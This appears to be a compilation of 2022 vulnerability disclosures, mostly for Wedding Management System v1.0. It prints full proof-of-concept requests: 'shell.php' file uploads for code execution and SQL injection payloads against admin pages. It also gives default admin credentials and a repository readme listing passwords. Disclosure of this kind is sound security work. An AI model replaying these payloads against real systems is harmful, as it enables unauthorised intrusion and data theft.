In Wedding Management System v1.0, there is an arbitrary file upload vulnerability in the picture upload point of "photos_edit.php" file.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has arbitrary code execution (RCE)**

vendor: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability url: http://ip/Wedding-Management/admin/photos\_edit.php?id=37

Loophole location：The editing function of "Gallery" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "photos\_edit.php" file.

Click "Edit" to save

Request package for file upload：

POST /Wedding\-Management/admin/photos\_edit.php?id\=37 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management/admin/photos\_edit.php?id=37
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------30999215895801
Content-Length: 826
\-----------------------------30999215895801
Content-Disposition: form-data; name="booking\_id"
34
\-----------------------------30999215895801
Content-Disposition: form-data; name="title"
\-----------------------------30999215895801
Content-Disposition: form-data; name="caption"
\-----------------------------30999215895801
Content-Disposition: form-data; name="alternate\_text"
\-----------------------------30999215895801
Content-Disposition: form-data; name="description"
\-----------------------------30999215895801
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------30999215895801
Content-Disposition: form-data; name="submit"
Edit
\-----------------------------30999215895801--

The files will be uploaded to this directory \\admin\\upload\\gallery\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-30819: bug_report/RCE-3.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL injection via /Wedding-Management/admin/blog_events_edit.php?id=31.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has SQL injection**

Author： k0xx

The password for the backend login account is: admin@mail.com/Password@123

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: /Wedding-Management/admin/client\_edit.php?booking=31&user\_id=

Vulnerability location: /Wedding-Management/admin/client\_edit.php?booking=31&user\_id=,user\_id

\[+\] Payload: /Wedding-Management/admin/client\_edit.php?booking=31&user\_id=31%20and%20length%20(database())%20=9 // Leak place ---> user\_id

Current database name: dbwedding,length is 9

GET /Wedding\-Management/admin/client\_edit.php?booking\=31&user\_id\=31%20and%20length%20(database())%20\=9 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

When length (database ()) = 8, Content-Length: 14701

When length (database ()) = 9, Content-Length: 14095

CVE-2022-30818: bug_report/SQLi-10.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection via admin\client_assign.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: \\admin\\client\_assign.php

Vulnerability location: /Wedding-Management/admin/client\_assign.php?booking=, booking

\[+\] Payload: booking=-31%20union%20select%201,2,3,4,5,database(),7,8--+

dbname = dbwedding

GET /Wedding\-Management/admin/client\_assign.php?booking\=\-31%20union%20select%201,2,3,4,5,database(),7,8\--+&user\_id=31 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-30826: bug_report/SQLi-3.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection via \admin\photos_edit.php.

**Wedding Management System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: \\admin\\photos\_edit.php

Vulnerability location: /Wedding-Management/admin/photos\_edit.php?id=, id

\[+\] Payload: id=-37%20union%20select%201,2,database(),4,5,6,7,8,9,10--+

dbname = dbwedding

GET /Wedding\-Management/admin/photos\_edit.php?id\=\-37%20union%20select%201,2,database(),4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-30828: bug_report/SQLi-6.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection via \admin\package_edit.php.

Permalink

**Wedding Management System v1.0 by codeastr.com has SQL injection**

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: \\admin\\package\_edit.php

Vulnerability location: /Wedding-Management/admin/package\_edit.php?id=, id

\[+\] Payload: id=-1%20union%20select%201,2,database(),4--+

dbname = dbwedding

GET /Wedding\-Management/admin/package\_edit.php?id\=\-1%20union%20select%201,2,database(),4\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

CVE-2022-30827: bug_report/SQLi-4.md at main · k0xx11/bug_report

Ecommerce-project-with-php-and-mysqli-Fruits-Bazar 1.0 is vulnerable to SQL Injection in \search_product.php via the keyword parameters.

creativesaiful / **Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-** Public

*   Notifications
*   Fork 2
*   Star 3
    

This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

3 stars 2 forks

Star

Notifications

*   Code
*   Issues
*   Pull requests
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

More

master

Switch branches/tags

**1** branch **0** tags

Code

**Latest commit**

creativesaiful somthing

c07a847

Sep 16, 2021

somthing

c07a847

**Git stats**

*   **25** commits

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

admin

assets

includes

json

addtocart.php

all\_product.php

catagory.php

ecommerce.sql

exist\_order.php

index.php

readme.txt

search\_product.php

single\_product.php

user\_login.php

user\_password\_recover.php

user\_password\_update.php

user\_register.php

userprofile copy.php

userprofile.php

**readme.txt**

1\. First create a database name ecommerce in your database. Than import ecommerce.sql file in your ecommerce database.

admin access:
saifulislamsapon@gmail.com
pass:1234


user access:
saifulislamsapon@gmail.com
123

**About**

This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

**Topics**

ecommerce-website php-website php-project core-php project-samples php-admin-panel project-example basic-ecommerce full-stack-web-development

**Resources**

Readme

**Stars**

**3** stars

**Watchers**

**1** watching

**Forks**

**2** forks

**Releases**

No releases published

**Packages**

No packages published  

**Languages**

*   CSS 36.7%
*   JavaScript 29.0%
*   SCSS 25.1%
*   PHP 8.6%
*   Hack 0.6%

CVE-2022-30478: GitHub - creativesaiful/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-: This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.

CVE-2022-30470: FileRun - Selfhosted File Manager with Sharing and Backup for Photos, Docs & More

In Wedding Management System v1.0, there is an arbitrary file upload vulnerability in the picture upload point of "users_profile.php" file.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has arbitrary code execution (RCE)**

vendor: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability url: http://ip/Wedding-Management/admin/users\_profile.php

Loophole location：The editing function of "Liam moore" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "users\_profile.php" file.

Click "Edit My Account" to save

Request package for file upload：

POST /Wedding\-Management/admin/users\_profile.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management/admin/users\_profile.php
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------270312135209
Content-Length: 1045
\-----------------------------270312135209
Content-Disposition: form-data; name="profile\_picture"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------270312135209
Content-Disposition: form-data; name="firstname"
Liam
\-----------------------------270312135209
Content-Disposition: form-data; name="lastname"
Moore
\-----------------------------270312135209
Content-Disposition: form-data; name="email"
admin@mail.com
\-----------------------------270312135209
Content-Disposition: form-data; name="username"
adminliam
\-----------------------------270312135209
Content-Disposition: form-data; name="gender"
m
\-----------------------------270312135209
Content-Disposition: form-data; name="address"
Grand Meadows
\-----------------------------270312135209
Content-Disposition: form-data; name="designation"
0
\-----------------------------270312135209
Content-Disposition: form-data; name="submit"
\-----------------------------270312135209--

The files will be uploaded to this directory \\admin\\upload\\users\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-30822: bug_report/RCE-5.md at main · k0xx11/bug_report

In Wedding Management v1.0, there is an arbitrary file upload vulnerability in the picture upload point of "users_edit.php" file.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has arbitrary code execution (RCE)**

vendor: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability url: http://ip/Wedding-Management/admin/users\_edit.php?id=8

Loophole location：The editing function of "User Management" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "users\_edit.php" file.

Click "Edit User" to save

Request package for file upload：

POST /Wedding\-Management/admin/users\_edit.php?id\=8 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management/admin/users\_edit.php?id=8
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------11784258372980
Content-Length: 1069
\-----------------------------11784258372980
Content-Disposition: form-data; name="submit"
\-----------------------------11784258372980
Content-Disposition: form-data; name="profile\_picture"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------11784258372980
Content-Disposition: form-data; name="firstname"
Pharell
\-----------------------------11784258372980
Content-Disposition: form-data; name="lastname"
Colin
\-----------------------------11784258372980
Content-Disposition: form-data; name="email"
pharell@mail.com
\-----------------------------11784258372980
Content-Disposition: form-data; name="username"
pcolin
\-----------------------------11784258372980
Content-Disposition: form-data; name="gender"
m
\-----------------------------11784258372980
Content-Disposition: form-data; name="address"
115 Test Street
\-----------------------------11784258372980
Content-Disposition: form-data; name="designation"
1
\-----------------------------11784258372980--

The files will be uploaded to this directory \\admin\\upload\\users\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-30820: bug_report/RCE-4.md at main · k0xx11/bug_report

In Wedding Management System v1.0, the editing function of the "Services" module in the background management system has an arbitrary file upload vulnerability in the picture upload point of "package_edit.php" file.

Permalink

Cannot retrieve contributors at this time

**Wedding Management System v1.0 by codeastr.com has arbitrary code execution (RCE)**

vendor: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability url: http://ip/Wedding-Management/admin/package\_edit.php?id=1

Loophole location：The editing function of "Services" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "package\_edit.php" file.

Click "Edit" to save

Request package for file upload：

POST /Wedding\-Management/admin/package\_edit.php?id\=1 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management/admin/package\_edit.php?id=1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------28704520716321
Content-Length: 534
\-----------------------------28704520716321
Content-Disposition: form-data; name="wedding\_type"
2
\-----------------------------28704520716321
Content-Disposition: form-data; name="price"
0.00
\-----------------------------28704520716321
Content-Disposition: form-data; name="preview\_image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------28704520716321
Content-Disposition: form-data; name="submit"
\-----------------------------28704520716321--

The files will be uploaded to this directory \\admin\\upload\\categories\\

We visited the directory of the file in the browser and found that the code had been executed

Tag

#php